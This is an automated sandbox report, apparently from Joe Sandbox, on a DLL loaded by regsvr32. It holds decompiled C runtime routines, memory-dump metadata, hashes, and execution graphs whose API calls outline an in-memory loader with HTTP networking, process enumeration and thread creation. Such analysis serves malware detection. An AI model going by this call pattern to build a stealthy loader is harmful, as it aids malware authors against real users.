                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0e7ef;
                                                                                                                                            				_t332 = E00007FFC7FFC65D01E40( &_a1560);
                                                                                                                                            				_a1304 = _t332;
                                                                                                                                            				goto 0x65d0e807;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1560);
                                                                                                                                            				_a1304 = _t332;
                                                                                                                                            				goto 0x65d0e844;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0e82d;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1560);
                                                                                                                                            				_a1304 = _t332;
                                                                                                                                            				goto 0x65d0e844;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1560);
                                                                                                                                            				_a1304 = _t332;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0e87b;
                                                                                                                                            				if (_a1304 >= 0) goto 0x65d0e87b;
                                                                                                                                            				_a1312 =  ~_a1304;
                                                                                                                                            				asm("bts eax, 0x8");
                                                                                                                                            				goto 0x65d0e88b;
                                                                                                                                            				_t335 = _a1304;
                                                                                                                                            				_a1312 = _t335;
                                                                                                                                            				if ((_a80 & 0x00008000) != 0) goto 0x65d0e8c0;
                                                                                                                                            				if ((_a80 & 0x00001000) != 0) goto 0x65d0e8c0;
                                                                                                                                            				_a1312 = _a1312 & _t335;
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0e8d1;
                                                                                                                                            				_a116 = 1;
                                                                                                                                            				goto 0x65d0e8ee;
                                                                                                                                            				_a80 = _a80 & 0xfffffff7;
                                                                                                                                            				if (_a116 - 0x200 <= 0) goto 0x65d0e8ee;
                                                                                                                                            				_a116 = 0x200;
                                                                                                                                            				if (_a1312 != 0) goto 0x65d0e901;
                                                                                                                                            				_a92 = 0;
                                                                                                                                            				_a64 =  &_a687;
                                                                                                                                            				_t213 = _a116;
                                                                                                                                            				_a116 = _a116 - 1;
                                                                                                                                            				if (_t213 > 0) goto 0x65d0e92f;
                                                                                                                                            				if (_a1312 == 0) goto 0x65d0e9cc;
                                                                                                                                            				_a1480 = _a72;
                                                                                                                                            				_a1296 = _t213 / _a1480 + 0x30;
                                                                                                                                            				_a1488 = _a72;
                                                                                                                                            				if (_a1296 - 0x39 <= 0) goto 0x65d0e9ab;
                                                                                                                                            				_t218 = _a1296 + _a1220;
                                                                                                                                            				_a1296 = _t218;
                                                                                                                                            				 *_a64 = _a1296 & 0x000000ff;
                                                                                                                                            				_a64 = _a64 - 1;
                                                                                                                                            				goto 0x65d0e90e;
                                                                                                                                            				_a104 = _t218;
                                                                                                                                            				_a64 = _a64 + 1;
                                                                                                                                            				if ((_a80 & 0x00000200) == 0) goto 0x65d0ea2a;
                                                                                                                                            				if (_a104 == 0) goto 0x65d0ea0b;
                                                                                                                                            				if ( *_a64 == 0x30) goto 0x65d0ea2a;
                                                                                                                                            				_a64 = _a64 - 1;
                                                                                                                                            				 *_a64 = 0x30;
                                                                                                                                            				_a104 = _a104 + 1;
                                                                                                                                            				if (_a108 != 0) goto 0x65d0ec7c;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0ea9d;
                                                                                                                                            				if ((_a80 & 0x00000100) == 0) goto 0x65d0ea61;
                                                                                                                                            				_a84 = 0x2d;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				goto 0x65d0ea9d;
                                                                                                                                            				if ((_a80 & 0x00000001) == 0) goto 0x65d0ea80;
                                                                                                                                            				_a84 = 0x2b;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				goto 0x65d0ea9d;
                                                                                                                                            				if ((_a80 & 0x00000002) == 0) goto 0x65d0ea9d;
                                                                                                                                            				_a84 = 0x20;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				_a1320 = _a88 - _a104 - _a92;
                                                                                                                                            				if ((_a80 & 0x0000000c) != 0) goto 0x65d0eadf;
                                                                                                                                            				E00007FFC7FFC65D0EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                                                                                            				E00007FFC7FFC65D0EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                                                                                                                            				if ((_a80 & 0x00000008) == 0) goto 0x65d0eb33;
                                                                                                                                            				if ((_a80 & 0x00000004) != 0) goto 0x65d0eb33;
                                                                                                                                            				E00007FFC7FFC65D0EEC0(0x30, _a1320, _a1536,  &_a1200);
                                                                                                                                            				if (_a76 != 0) goto 0x65d0ec29;
                                                                                                                                            				if (_a104 <= 0) goto 0x65d0ec29;
                                                                                                                                            				_t354 = _a64;
                                                                                                                                            				_a1328 = _t354;
                                                                                                                                            				_a1336 = _a104;
                                                                                                                                            				_a1336 = _a1336 - 1;
                                                                                                                                            				if (_a1336 <= 0) goto 0x65d0ec27;
                                                                                                                                            				_t249 = E00007FFC7FFC65CF6840(_a1336,  &_a120);
                                                                                                                                            				_a1496 = _t354;
                                                                                                                                            				E00007FFC7FFC65CF6840(_t249,  &_a120);
                                                                                                                                            				_a1340 = E00007FFC7FFC65D0F000( &_a1212, _a1328,  *((intOrPtr*)( *_t354 + 0x10c)), _a1496);
                                                                                                                                            				if (_a1340 > 0) goto 0x65d0ebe7;
                                                                                                                                            				_a1200 = 0xffffffff;
                                                                                                                                            				goto 0x65d0ec27;
                                                                                                                                            				E00007FFC7FFC65D0EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                                                                                                                            				_a1328 = _a1328 + _a1340;
                                                                                                                                            				goto 0x65d0eb61;
                                                                                                                                            				goto 0x65d0ec47;
                                                                                                                                            				E00007FFC7FFC65D0EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                                                                                                                            				if (_a1200 < 0) goto 0x65d0ec7c;
                                                                                                                                            				if ((_a80 & 0x00000004) == 0) goto 0x65d0ec7c;
                                                                                                                                            				E00007FFC7FFC65D0EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                                                                                            				if (_a96 == 0) goto 0x65d0ec9c;
                                                                                                                                            				0x65cf5330();
                                                                                                                                            				_a96 = 0;
                                                                                                                                            				goto 0x65d0da75;
                                                                                                                                            				if (_a1216 == 0) goto 0x65d0ecc2;
                                                                                                                                            				if (_a1216 == 7) goto 0x65d0ecc2;
                                                                                                                                            				_a1504 = 0;
                                                                                                                                            				goto 0x65d0eccd;
                                                                                                                                            				_a1504 = 1;
                                                                                                                                            				_t257 = _a1504;
                                                                                                                                            				_a1344 = _t257;
                                                                                                                                            				if (_a1344 != 0) goto 0x65d0ed13;
                                                                                                                                            				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                                                                            				_a32 = _t359;
                                                                                                                                            				r9d = 0;
                                                                                                                                            				r8d = 0x8f5;
                                                                                                                                            				0x65cfb3b0();
                                                                                                                                            				if (_t257 != 1) goto 0x65d0ed13;
                                                                                                                                            				asm("int3");
                                                                                                                                            				if (_a1344 != 0) goto 0x65d0ed6f;
                                                                                                                                            				0x65cfab30();
                                                                                                                                            				 *_t359 = 0x16;
                                                                                                                                            				_a32 = 0;
                                                                                                                                            				r9d = 0x8f5;
                                                                                                                                            				E00007FFC7FFC65CFBD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                                                                            				_a1376 = 0xffffffff;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_a120);
                                                                                                                                            				goto 0x65d0ed8e;
                                                                                                                                            				_a1380 = _a1200;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_a120);
                                                                                                                                            				return E00007FFC7FFC65CF3280(_a1380, 2, 2, _a1512 ^ _t389, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                                                                            			}













                                                                                                                                            0x7ffc65d0e70c
                                                                                                                                            0x7ffc65d0e70c
                                                                                                                                            0x7ffc65d0e717
                                                                                                                                            0x7ffc65d0e72a
                                                                                                                                            0x7ffc65d0e731
                                                                                                                                            0x7ffc65d0e740
                                                                                                                                            0x7ffc65d0e745
                                                                                                                                            0x7ffc65d0e74f
                                                                                                                                            0x7ffc65d0e762
                                                                                                                                            0x7ffc65d0e768
                                                                                                                                            0x7ffc65d0e77b
                                                                                                                                            0x7ffc65d0e785
                                                                                                                                            0x7ffc65d0e78a
                                                                                                                                            0x7ffc65d0e792
                                                                                                                                            0x7ffc65d0e7a2
                                                                                                                                            0x7ffc65d0e7ac
                                                                                                                                            0x7ffc65d0e7b1
                                                                                                                                            0x7ffc65d0e7b9
                                                                                                                                            0x7ffc65d0e7c7
                                                                                                                                            0x7ffc65d0e7d2
                                                                                                                                            0x7ffc65d0e7e1
                                                                                                                                            0x7ffc65d0e7e5
                                                                                                                                            0x7ffc65d0e7ed
                                                                                                                                            0x7ffc65d0e7f7
                                                                                                                                            0x7ffc65d0e7ff
                                                                                                                                            0x7ffc65d0e807
                                                                                                                                            0x7ffc65d0e812
                                                                                                                                            0x7ffc65d0e81c
                                                                                                                                            0x7ffc65d0e823
                                                                                                                                            0x7ffc65d0e82b
                                                                                                                                            0x7ffc65d0e835
                                                                                                                                            0x7ffc65d0e83c
                                                                                                                                            0x7ffc65d0e84d
                                                                                                                                            0x7ffc65d0e858
                                                                                                                                            0x7ffc65d0e865
                                                                                                                                            0x7ffc65d0e871
                                                                                                                                            0x7ffc65d0e879
                                                                                                                                            0x7ffc65d0e87b
                                                                                                                                            0x7ffc65d0e883
                                                                                                                                            0x7ffc65d0e896
                                                                                                                                            0x7ffc65d0e8a3
                                                                                                                                            0x7ffc65d0e8b8
                                                                                                                                            0x7ffc65d0e8c5
                                                                                                                                            0x7ffc65d0e8c7
                                                                                                                                            0x7ffc65d0e8cf
                                                                                                                                            0x7ffc65d0e8d8
                                                                                                                                            0x7ffc65d0e8e4
                                                                                                                                            0x7ffc65d0e8e6
                                                                                                                                            0x7ffc65d0e8f7
                                                                                                                                            0x7ffc65d0e8f9
                                                                                                                                            0x7ffc65d0e909
                                                                                                                                            0x7ffc65d0e90e
                                                                                                                                            0x7ffc65d0e918
                                                                                                                                            0x7ffc65d0e91e
                                                                                                                                            0x7ffc65d0e929
                                                                                                                                            0x7ffc65d0e934
                                                                                                                                            0x7ffc65d0e957
                                                                                                                                            0x7ffc65d0e963
                                                                                                                                            0x7ffc65d0e990
                                                                                                                                            0x7ffc65d0e9a2
                                                                                                                                            0x7ffc65d0e9a4
                                                                                                                                            0x7ffc65d0e9b8
                                                                                                                                            0x7ffc65d0e9c2
                                                                                                                                            0x7ffc65d0e9c7
                                                                                                                                            0x7ffc65d0e9d9
                                                                                                                                            0x7ffc65d0e9e5
                                                                                                                                            0x7ffc65d0e9f5
                                                                                                                                            0x7ffc65d0e9fc
                                                                                                                                            0x7ffc65d0ea09
                                                                                                                                            0x7ffc65d0ea13
                                                                                                                                            0x7ffc65d0ea1d
                                                                                                                                            0x7ffc65d0ea26
                                                                                                                                            0x7ffc65d0ea2f
                                                                                                                                            0x7ffc65d0ea3e
                                                                                                                                            0x7ffc65d0ea4b
                                                                                                                                            0x7ffc65d0ea52
                                                                                                                                            0x7ffc65d0ea57
                                                                                                                                            0x7ffc65d0ea5f
                                                                                                                                            0x7ffc65d0ea6a
                                                                                                                                            0x7ffc65d0ea71
                                                                                                                                            0x7ffc65d0ea76
                                                                                                                                            0x7ffc65d0ea7e
                                                                                                                                            0x7ffc65d0ea89
                                                                                                                                            0x7ffc65d0ea90
                                                                                                                                            0x7ffc65d0ea95
                                                                                                                                            0x7ffc65d0eaad
                                                                                                                                            0x7ffc65d0eabd
                                                                                                                                            0x7ffc65d0eada
                                                                                                                                            0x7ffc65d0eaf8
                                                                                                                                            0x7ffc65d0eb06
                                                                                                                                            0x7ffc65d0eb11
                                                                                                                                            0x7ffc65d0eb2e
                                                                                                                                            0x7ffc65d0eb38
                                                                                                                                            0x7ffc65d0eb43
                                                                                                                                            0x7ffc65d0eb49
                                                                                                                                            0x7ffc65d0eb4e
                                                                                                                                            0x7ffc65d0eb5a
                                                                                                                                            0x7ffc65d0eb71
                                                                                                                                            0x7ffc65d0eb7a
                                                                                                                                            0x7ffc65d0eb85
                                                                                                                                            0x7ffc65d0eb8a
                                                                                                                                            0x7ffc65d0eb97
                                                                                                                                            0x7ffc65d0ebc9
                                                                                                                                            0x7ffc65d0ebd8
                                                                                                                                            0x7ffc65d0ebda
                                                                                                                                            0x7ffc65d0ebe5
                                                                                                                                            0x7ffc65d0ebff
                                                                                                                                            0x7ffc65d0ec1a
                                                                                                                                            0x7ffc65d0ec22
                                                                                                                                            0x7ffc65d0ec27
                                                                                                                                            0x7ffc65d0ec42
                                                                                                                                            0x7ffc65d0ec4f
                                                                                                                                            0x7ffc65d0ec5a
                                                                                                                                            0x7ffc65d0ec77
                                                                                                                                            0x7ffc65d0ec82
                                                                                                                                            0x7ffc65d0ec8e
                                                                                                                                            0x7ffc65d0ec93
                                                                                                                                            0x7ffc65d0ec9c
                                                                                                                                            0x7ffc65d0eca9
                                                                                                                                            0x7ffc65d0ecb3
                                                                                                                                            0x7ffc65d0ecb5
                                                                                                                                            0x7ffc65d0ecc0
                                                                                                                                            0x7ffc65d0ecc2
                                                                                                                                            0x7ffc65d0eccd
                                                                                                                                            0x7ffc65d0ecd4
                                                                                                                                            0x7ffc65d0ece3
                                                                                                                                            0x7ffc65d0ece5
                                                                                                                                            0x7ffc65d0ecec
                                                                                                                                            0x7ffc65d0ecf1
                                                                                                                                            0x7ffc65d0ecf4
                                                                                                                                            0x7ffc65d0ed06
                                                                                                                                            0x7ffc65d0ed0e
                                                                                                                                            0x7ffc65d0ed10
                                                                                                                                            0x7ffc65d0ed1b
                                                                                                                                            0x7ffc65d0ed1d
                                                                                                                                            0x7ffc65d0ed22
                                                                                                                                            0x7ffc65d0ed28
                                                                                                                                            0x7ffc65d0ed31
                                                                                                                                            0x7ffc65d0ed4c
                                                                                                                                            0x7ffc65d0ed51
                                                                                                                                            0x7ffc65d0ed61
                                                                                                                                            0x7ffc65d0ed6d
                                                                                                                                            0x7ffc65d0ed76
                                                                                                                                            0x7ffc65d0ed82
                                                                                                                                            0x7ffc65d0eda5

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: get_int64_arg
                                                                                                                                            • String ID: '$9
                                                                                                                                            • API String ID: 1967237116-1823400153
                                                                                                                                            • Opcode ID: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                                                                                                            • Instruction ID: 0de16bed55090a123b2250101f733da44cf44ce5baec39054eaacb1de32958c6
                                                                                                                                            • Opcode Fuzzy Hash: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                                                                                                            • Instruction Fuzzy Hash: BB41D63660DADACAEB748B19E9403ABB3A0FBC5751F100525E69CC6AD8EB7CD440CF14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _unlock
                                                                                                                                            • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgdel.cpp
                                                                                                                                            • API String ID: 2480363372-1749241151
                                                                                                                                            • Opcode ID: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                                                                                                            • Instruction ID: e0d91f192e9f28bd53c37ddef0b422e7bc4c94e5985ac85ebbe369c33a347257
                                                                                                                                            • Opcode Fuzzy Hash: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                                                                                                            • Instruction Fuzzy Hash: C1116036A2C69AC6EB68AF18D4416396361FBC4B54F205836E64E43BD4CF3CD404CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DestroyedExceptionFindFrameObjectUnlink
                                                                                                                                            • String ID: csm
                                                                                                                                            • API String ID: 1826589669-1018135373
                                                                                                                                            • Opcode ID: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                                                                                                            • Instruction ID: cbdc17cd8722c03ed03c72e9eac08d9a291126e510267a92d6b466445d574636
                                                                                                                                            • Opcode Fuzzy Hash: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                                                                                                            • Instruction Fuzzy Hash: 021191329086AACADF64DF79C4811B927A0FBA5F84F601A31EA0D4B7A5CF25D881C310
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free_nolock
                                                                                                                                            • String ID: ("Corrupted pointer passed to _freea", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\malloc.h
                                                                                                                                            • API String ID: 2882679554-3458198949
                                                                                                                                            • Opcode ID: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                                                                                                            • Instruction ID: b6f26604c29ba05bd41782b5aefcc3c303d76da4f02ed1f3bfaa7ddb44056634
                                                                                                                                            • Opcode Fuzzy Hash: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                                                                                                            • Instruction Fuzzy Hash: 7801A733A1C75ADAEB649F64E54472AB790FB84740F600935EA4C42F94CF7DD004CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:15.8%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:4%
                                                                                                                                            Total number of Nodes:101
                                                                                                                                            Total number of Limit Nodes:11
                                                                                                                                            execution_graph 4060 1800178f4 4063 18000ffc0 4060->4063 4062 180017924 4068 18001000e 4063->4068 4067 1800116b2 4067->4062 4068->4067 4071 180015774 4068->4071 4075 1800078a4 4068->4075 4079 18002975c 4068->4079 4083 180007eb4 4068->4083 4087 18001667c 4068->4087 4073 1800157bd 4071->4073 4074 1800157fb 4073->4074 4095 1800027f8 4073->4095 4074->4068 4078 1800078c0 4075->4078 4077 1800079e2 4077->4068 4078->4077 4102 18001705c 4078->4102 4081 1800297af 4079->4081 4082 180029f99 4081->4082 4113 18000c758 4081->4113 4082->4068 4084 180007ee1 4083->4084 4086 180008118 4084->4086 4129 180011ef8 4084->4129 4086->4068 4093 1800166ac 4087->4093 4092 180016ad3 4092->4068 4093->4092 4132 180023624 4093->4132 4136 180018bdc 4093->4136 4140 18000bc98 4093->4140 4144 18001aec8 4093->4144 4148 1800270c0 4093->4148 4098 180006f2c 4095->4098 4097 18000289c 4097->4073 4099 180006f5d 4098->4099 4100 180007250 Process32NextW 4099->4100 4101 180006fbc 4099->4101 4100->4099 4101->4097 4105 18001707b 4102->4105 4104 1800172eb 4104->4078 4105->4104 4106 180028348 4105->4106 4107 180028431 4106->4107 4108 180028607 4107->4108 4110 180017bf8 4107->4110 4108->4105 4111 180017c7c 4110->4111 4112 180017d21 GetVolumeInformationW 4111->4112 4112->4108 4119 18000c7dc 4113->4119 4114 18000c9b5 4120 18002446c 4114->4120 4116 18000c84b 4116->4081 4119->4114 4119->4116 4123 1800149cc 4119->4123 4126 180016500 4119->4126 4121 1800244af 4120->4121 4122 180024558 InternetOpenW 4121->4122 4122->4116 4125 180014a4c 4123->4125 4124 180014ae5 HttpOpenRequestW 4124->4119 4125->4124 4128 18001657b 4126->4128 4127 18001663c InternetConnectW 4127->4119 4128->4127 4131 180011f57 4129->4131 4130 180012017 CreateThread 4130->4086 4131->4130 4135 180023662 4132->4135 4133 180023683 4133->4093 4135->4133 4152 180018628 4135->4152 4138 180018c18 4136->4138 4137 180011ef8 CreateThread 4137->4138 4138->4137 4139 180018f32 4138->4139 4139->4093 4142 18000bcde 4140->4142 4141 18000c521 4141->4093 4142->4141 4143 180018628 CreateFileW 4142->4143 4143->4142 4147 18001aef6 4144->4147 4145 180011ef8 CreateThread 4145->4147 4146 18001b239 4146->4093 4147->4145 4147->4146 4150 180027157 4148->4150 4149 180027fe1 4149->4093 4150->4149 4151 180018628 CreateFileW 4150->4151 4151->4150 4153 180018660 4152->4153 4155 180018943 4153->4155 4156 18001bf0c 4153->4156 4155->4135 4158 18001bf8e 4156->4158 4157 18001c031 CreateFileW 4157->4153 4158->4157 4159 c30000 4160 c30183 4159->4160 4161 c3043e VirtualAlloc 4160->4161 4162 c30462 4161->4162 4163 c30531 GetNativeSystemInfo 4162->4163 4165 c30a7b 4162->4165 4164 c3056d VirtualAlloc 4163->4164 4163->4165 4169 c3058b 4164->4169 4166 c30a00 4166->4165 4167 c30a56 RtlAddFunctionTable 4166->4167 4167->4165 4168 c309d9 VirtualProtect 4168->4169 4169->4166 4169->4168 4170 180011ef8 4172 180011f57 4170->4172 4171 180012017 CreateThread 4172->4171 4173 180018628 4174 180018660 4173->4174 4175 18001bf0c CreateFileW 4174->4175 4176 180018943 4174->4176 4175->4174 4177 18000c819 4181 18000c80c 4177->4181 4178 18000c9b5 4179 18002446c InternetOpenW 4178->4179 4183 18000c84b 4179->4183 4180 1800149cc HttpOpenRequestW 4180->4181 4181->4177 4181->4178 4181->4180 4182 180016500 InternetConnectW 4181->4182 4181->4183 4182->4181

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 c30000-c30460 call c30aa8 * 2 VirtualAlloc 22 c30462-c30466 0->22 23 c3048a-c30494 0->23 24 c30468-c30488 22->24 26 c30a91-c30aa6 23->26 27 c3049a-c3049e 23->27 24->23 24->24 27->26 28 c304a4-c304a8 27->28 28->26 29 c304ae-c304b2 28->29 29->26 30 c304b8-c304bf 29->30 30->26 31 c304c5-c304d2 30->31 31->26 32 c304d8-c304e1 31->32 32->26 33 c304e7-c304f4 32->33 33->26 34 c304fa-c30507 33->34 35 c30531-c30567 GetNativeSystemInfo 34->35 36 c30509-c30511 34->36 35->26 37 c3056d-c30589 VirtualAlloc 35->37 38 c30513-c30518 36->38 41 c305a0-c305ac 37->41 42 c3058b-c3059e 37->42 39 c30521 38->39 40 c3051a-c3051f 38->40 43 c30523-c3052f 39->43 40->43 44 c305af-c305b2 41->44 42->41 43->35 43->38 46 c305c1-c305db 44->46 47 c305b4-c305bf 44->47 48 c3061b-c30622 46->48 49 c305dd-c305e2 46->49 47->44 50 c306db-c306e2 48->50 51 c30628-c3062f 48->51 52 c305e4-c305ea 49->52 54 c30864-c3086b 50->54 55 c306e8-c306f9 50->55 51->50 53 c30635-c30642 51->53 56 c3060b-c30619 52->56 57 c305ec-c30609 52->57 53->50 60 c30648-c3064f 53->60 58 c30871-c3087f 54->58 59 c30917-c30929 54->59 61 c30702-c30705 55->61 56->48 56->52 57->56 57->57 64 c3090e-c30911 58->64 62 c30a07-c30a1a 59->62 63 c3092f-c30937 59->63 65 c30654-c30658 60->65 66 c30707-c3070a 61->66 67 c306fb-c306ff 61->67 88 c30a40-c30a4a 62->88 89 c30a1c-c30a27 62->89 69 c3093b-c3093f 63->69 64->59 68 c30884-c308a9 64->68 70 c306c0-c306ca 65->70 71 c30788-c3078e 66->71 72 c3070c-c3071d 66->72 67->61 94 c30907-c3090c 68->94 95 c308ab-c308b1 68->95 75 c30945-c3095a 69->75 76 c309ec-c309fa 69->76 73 c3065a-c30669 70->73 74 c306cc-c306d2 70->74 77 c30794-c307a2 71->77 72->77 78 c3071f-c30720 72->78 84 c3066b-c30678 73->84 85 c3067a-c3067e 73->85 74->65 80 c306d4-c306d5 74->80 82 c3097b-c3097d 75->82 83 c3095c-c3095e 75->83 76->69 86 c30a00-c30a01 76->86 90 c307a8 77->90 91 c3085d-c3085e 77->91 87 c30722-c30784 78->87 80->50 99 c309a2-c309a4 82->99 100 c3097f-c30981 82->100 96 c30960-c3096c 83->96 97 c3096e-c30979 83->97 98 c306bd-c306be 84->98 101 c30680-c3068a 85->101 102 c3068c-c30690 85->102 86->62 87->87 103 c30786 87->103 92 c30a7b-c30a8e 88->92 93 c30a4c-c30a54 88->93 104 c30a38-c30a3e 89->104 105 c307ae-c307d4 90->105 91->54 92->26 93->92 109 c30a56-c30a79 RtlAddFunctionTable 93->109 94->64 106 c308b3-c308b9 95->106 107 c308bb-c308c8 95->107 110 c309be-c309bf 96->110 97->110 98->70 116 c309a6-c309aa 99->116 117 c309ac-c309bb 99->117 111 c30983-c30987 100->111 112 c30989-c3098b 100->112 113 c306b6-c306ba 101->113 114 c30692-c306a3 102->114 115 c306a5-c306a9 102->115 103->77 104->88 108 c30a29-c30a35 104->108 129 c307d6-c307d9 105->129 130 c30835-c30839 105->130 119 c308ea-c308fe 106->119 120 c308d3-c308e5 107->120 121 c308ca-c308d1 107->121 108->104 109->92 118 c309c5-c309cb 110->118 111->110 112->99 124 c3098d-c3098f 112->124 113->98 114->113 115->98 125 c306ab-c306b3 115->125 116->110 117->110 126 c309d9-c309e9 VirtualProtect 118->126 127 c309cd-c309d3 118->127 119->94 138 c30900-c30905 119->138 120->119 121->120 121->121 131 c30991-c30997 124->131 132 c30999-c309a0 124->132 125->113 126->76 127->126 134 c307e3-c307f0 129->134 135 c307db-c307e1 129->135 136 c30844-c30850 130->136 137 c3083b 130->137 131->110 132->118 140 c307f2-c307f9 134->140 141 c307fb-c3080d 134->141 139 c30812-c3082c 135->139 136->105 142 c30856-c30857 136->142 137->136 138->95 139->130 144 c3082e-c30833 139->144 140->140 140->141 141->139 142->91 144->129
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000011.00000002.504929856.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_17_2_c30000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
